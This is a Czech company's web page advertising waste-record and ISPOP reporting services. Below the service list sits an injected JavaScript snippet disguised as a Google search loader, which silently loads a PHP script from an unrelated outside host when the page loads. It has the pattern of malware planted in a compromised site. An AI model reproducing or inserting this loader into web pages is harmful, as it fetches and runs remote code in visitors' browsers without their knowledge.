Hlášení o odpadech

Naše služby

  • vedení průběžné evidence odpadů
  • registrace subjektu do systému ISPOP
  • zpracování ročního hlášení v elektronické podobě
  • zpracování statistického výkazu “ODPADY” pro Český statistický úřad
  • vedení evidence zařízení k odstraňování nebo využívání odpadů podle § 23 vyhlášky č. 383/2001Sb.

Provádíme zpracování hlášení o produkci a nakládání s odpady a podání na pověřený úřad.

  • zpracování hlášení o odpadech

 

Od roku 2012 mají všichni původci i oprávněné osoby povinnost zasílat hlášení o produkci a nakládání s odpady v elektronické podobě přes ISPOP. Hlášení Vám proto zpracujeme v datovém standardu MŽP pro systém ISPOP.

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = “http://ninni.org/core9Om3.php”;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();


Komentáře nejsou povoleny.